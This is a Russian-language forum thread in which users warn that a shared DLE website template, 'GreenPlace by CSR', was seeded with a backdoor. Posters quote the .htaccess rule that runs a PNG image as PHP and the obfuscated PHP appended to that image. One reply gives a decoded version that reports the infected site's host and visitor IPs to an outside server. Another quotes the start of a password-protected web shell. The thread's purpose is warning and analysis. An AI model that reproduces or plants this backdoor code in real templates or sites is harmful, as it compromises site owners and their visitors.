Инфо Сюрприз в расшаренном шаблоне GreenPlace by CSR

Тема в разделе "DLE", создана пользователем Demon425, 25 окт 2010.

Информация :
Актуальная версия DataLife Engine 11.1
( Final Release v.11.1 | Скачать DataLife Engine | Скачать 11.1 demo )
Нужно ли обновляться | Как обновиться | Изменения в шаблонах
> Нет русских символов <
[Приватная тема DLE (Все подробности в ЛС к модератору раздела)]

Версии 10.0 и ниже - уязвимы!

Локализации | F.A.Q. | Внешний вид
Правила раздела | Правила форума
Обсуждение хайда карается баном!
В каждом сообщении указывайте версию DLE, которого они касаются!
Статус темы:
Закрыта.
Модераторы: killoff
  1. Demon425

    Demon425

    Регистр.:
    9 июл 2008
    Сообщения:
    439
    Симпатии:
    96
    Пересматривал недавно шаблоны, скачанные с разных сайтов, в том числе и отсюда.

    Наткнулся на шаблон GreenPlace by CSR. Откуда был скачан - не помню, суть не в том.

    В папке images в .htaccess в самый низ дописано:

    PHP:
    <FilesMatch "^(rss_taib)\.png$">
      
    ForceType application/x-httpd-php
    </FilesMatch>
    содержимое rss_taib.png ? помимо самой картинки в конец дописана вот такая ботва:

    PHP:
    <? $x13="\x64i\162n\x61m\145"$x14="fil\x65"$x15="\155\153d\x69r"$x16="\165\156\154i\156\153"
    $x0b="\0600\071";$x0c="no"; if($x0c=='ok'){$x15("\x74\145\163t_o\x6b",0777);}echo "\074s\164y\x6c\x65\076\142\x6f\x64\x79\173\146\157\x6e\164\055s\151z\x65:\x30\x70\170\x3bc\x6f\x6co\162:\x23\146ff}\074/\163\164yl\x65\076"$x0d="\150\164\164\160\072\x2f/".$x13($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$x0e=$_SERVER['HTTP_HOST']; $x0f=$_SERVER['REMOTE_ADDR']; $x10 = array('127.0.0.1'); foreach ($x10 as $x11) { if($x11==$x0f) {}else{if($_SERVER['HTTP_HOST']==$x0f){}else{$x12 = @$x14("htt\160\x3a\057\057styk\141c\150\x2ew\163/c\157k\x5fma\x69\156\056\160\x68p?\147u\075$x0e\046\165s\145\162=$x0b\046\x69\x70=$x0f\x26f=$x0d"); $x16('rss_taib.png'); }}}?>
    <? echo "\x3c\x73\164\x79\x6ce\x3e\142\157\x64y\173\146o\x6e\x74\x2d\163\x69\172\145\072\x30\160\x78\x3bc\x6fl\157\x72\x3a\x23\x66\x66\146\175</\163t\x79\x6c\145>";?>
    Что за ботва - пока не расшифровал, но шелл - однозначно. Так что - лишнее напоминание - будьте бдительны!
     
  2. -=BlackSmoke=-

    -=BlackSmoke=-

    Регистр.:
    4 авг 2009
    Сообщения:
    281
    Симпатии:
    49
    Это рип или оригинал?
     
  3. nafanyaa

    nafanyaa

    Регистр.:
    23 авг 2006
    Сообщения:
    286
    Симпатии:
    170
  4. Demon425

    Demon425

    Регистр.:
    9 июл 2008
    Сообщения:
    439
    Симпатии:
    96
    Это расшаренный оригинал, только перед тем, как его выложить кто-то добавил плюшку.

    Александр не тот человек, который бы такое делал.

    Мой пост - напоминание быть особо бдительными в период эпидемии взломов.

    nafanyaa, я читал ту тему, но там речь шла про ExtraNews, PinkHouse, Spring Design. Оказалось в этом шаблоне тоже кто-то редиску засунул. И в bb-codes, и в png.
     
  5. shamantc

    shamantc ЗлОй ШаМан

    Заблокирован
    Регистр.:
    3 ноя 2008
    Сообщения:
    655
    Симпатии:
    184
    На Античате уже было обсуждение данного кода
    PHP:
     <?php
     
    if("no"=='ok') {
         
    mkdir("test_ok",0777);
     }
     echo 
    "<style>body{font-size:0px;color:#fff}</style>";
     
    $ips = array('127.0.0.1');
     foreach (
    $ips as $ip) {
         if(
    $ip==$_SERVER['REMOTE_ADDR']) {
      
         } else {
             if(
    $_SERVER['HTTP_HOST']==$_SERVER['REMOTE_ADDR']){
      
             } else {
                 
    $x12 = @file("http://stykach.ws/cok_main.php?gu={$_SERVER['HTTP_HOST']}&user=009&ip={$_SERVER['REMOTE_ADDR']}&f="."http://".dirname($_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']));
                 
    unlink('rss_taib.png');
             }
         }
     }
    ?>
     <? echo "<style>body{font-size:0px;color:#fff}</style>";?>
     
  6. BKK

    BKK

    Регистр.:
    21 окт 2009
    Сообщения:
    163
    Симпатии:
    45
    палево жесткое:D
     
  7. fri

    fri Создатель

    Регистр.:
    14 авг 2009
    Сообщения:
    32
    Симпатии:
    1
    Вообще любой шаб, даже не фришный, есть смысл пересмотреть, мало ли кто чего туда положил.
    Встречал другой вариант, в картинках, где прилагается color.html в этом самом файле была плюха.
    PHP:
    <?php $x2a="\x63\150m\157\144"$x2b="\143\157\x70y"$x2c="c\157\165\x6e\164"$x2d="\x66\x63\154\157se"$x2e="\x66\x69l\x65"$x2f="\146\x73\157c\153\157\160\145n"$x30="\x66op\145\156"$x31="\146pu\x74\x73"$x32="\151m\160\x6co\x64e"$x33="\155d5"$x34="\x73e\x73\163\151\x6fn\x5fst\141\162\164"$x35="\x73\164\162\137\x72\x65\160\x6ca\143e"$x36="u\x6e\x6c\151\x6e\x6b"
    if(
    $_GET['upload']){$x34();if(isset($_GET['a']) && $_GET['a']=='logout') unset($_SESSION['auth']);if(isset($_POST['pass'])){ $x0b = array( 'root' => $x33($x33('uvCJlBF9eIcq9bEhUpg83baFcW9JKmqa')) ); if($x0b['root'] == $x33($x33($_POST['pass']))){$_SESSION['auth'] = true; }}if(!isset($_SESSION['auth']) || $_SESSION['auth'] != true){$x0f=$_GET['hp']; echo <<<EOF
    ну и так далее, весь код не привожу, его там много и никому он не нужен )) Пересматривайте всё, амигосы
     
  8. -=BlackSmoke=-

    -=BlackSmoke=-

    Регистр.:
    4 авг 2009
    Сообщения:
    281
    Симпатии:
    49
    там же модифицированный .htaccess, который указывает апачу, что надо выполнять html как php, без него данный код не имеет смысла.
     
  9. killoff

    killoff CD тихо, и не DVD меня ;)

    Moderator
    Регистр.:
    13 май 2008
    Сообщения:
    2.015
    Симпатии:
    679
    Неужели прикрепленная тема "[Info] Уязвимости в бесплатных шаблонах" не об этом говорит? К чему каждый 5-10-й пользователь создает отдельную тему на один и тот же вопрос? Да было в шаблоне, да прописали в htaccess, да вместо самой картинки в файле картинки прописан php код и т.д. и т.п. :mad: Одно и тоже каждый раз!!!
    :tcl:
     
Статус темы:
Закрыта.